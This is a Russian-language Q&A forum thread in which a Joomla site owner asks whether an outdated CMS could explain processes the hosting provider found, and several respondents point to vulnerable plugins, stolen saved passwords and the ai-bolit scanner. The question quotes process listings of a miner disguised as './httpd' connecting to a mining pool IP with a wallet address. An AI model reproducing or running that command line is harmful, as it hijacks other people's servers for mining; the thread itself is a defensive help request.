Задать вопрос
@darknefrit

Можно ли на хостинге запустить процесс через уязвимость в cms joomla на php?

Хостер обнаружил такие процеccы запущены якобы у меня. Может ли это быть из за того что используются не последние версии joomla??
mysite 224079 3.9 0.0 1883876 46716 ? Sl Sep26 3186:59 ./httpd -a cryptonight -o 178.32.145.31:8005 -u 47wAyitHfLHR8cEv53PZcchXAUyhkic7XMfRwuZXu1kLTNSnhwitQvMewuH1jAdxcDcqERNX5cDxbXtPEondx7g67R3zYjJ.570379051 -p x -kmysite 224746 3.8 0.0 1883876 46720 ? Sl Sep26 3057:16 ./httpd -a cryptonight -o 178.32.145.31:8005 -u 47wAyitHfLHR8cEv53PZcchXAUyhkic7XMfRwuZXu1kLTNSnhwitQvMewuH1jAdxcDcqERNX5cDxbXtPEondx7g67R3zYjJ.415556762 -p x -kmysite 539714 5.4 0.0 1883744 46608 ? Sl Oct04 3717:39 ./httpd -a cryptonight -o 178.32.145.31:8005 -u 47wAyitHfLHR8cEv53PZcchXAUyhkic7XMfRwuZXu1kLTNSnhwitQvMewuH1jAdxcDcqERNX5cDxbXtPEondx7g67R3zYjJ.572362064 -p x -k
  • Вопрос задан
  • 198 просмотров
Подписаться 1 Средний 2 комментария
Пригласить эксперта
Ответы на вопрос 4
Wolfnsex
@Wolfnsex
Если не хочешь быть первым - не вставай в очередь!
Хостер обнаружил такие процеccы запущены якобы у меня. Может ли это быть из за того что используются не последние версии joomla??
Это может быть по следующим причинам:
1. Используются не последние версии CMS
2. Используются сторонние расширения/модули/плагины в этой CMS (как известно, по статистике - в большинстве случаев проблема кроется именно в них)
3. Прочие варианты

Иными словами, это может быть "из-за дыры в безопасности", какой именно - Вам ответит либо специалист в этих вопросах, либо (возможно, хоть и очень мало вероятно) хостер. Без детального анализа, дать точный ответ на Ваш вопрос - невозможно.

Но, чисто гипотетически, запустить какой-то процесс на хостере - труда не составляет, если хостер не предпринял каких-либо мер для предотвращения подобных событий. Например, с помощью такой функции.

Другим, довольно частым вариантом "взлома" является практика "сохранения паролей" в различных программах, например, FileZilla, которые впоследствии успешно "крадутся" различными "вирусами" и прочим вредоносным ПО.
Ответ написан
Комментировать
Конечно может, я видил когда через жумулу смогли добраться до модулей apache
проверь сайт скрипото
https://revisium.com/ai/index.php?q=49134725515191...
Можно просто с консоли php -q ai-bolit.php
ну или с браузера
Ответ написан
Комментировать
Sanasol
@Sanasol
нельзя просто так взять и загуглить ошибку
Если это шаред, то хостер сам дурак и не осилил нормально настроить сервер. На шареде нельзя так просто взять и запускать/перезапускать апач смертным.

Если это впска то хостер тут не причем.
Ответ написан
@sergienkod
Если в php есть backdoor то без труда вам выше показали как, а какая cms это уже дело техники, в истории joomla были такие уязвимости, да и в истории других cms тоже все они фиксятся со временем, ваша задача как разработчика вовремя обновлять cms и прикрывать backdoor если атаку на сервер уже совершили
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы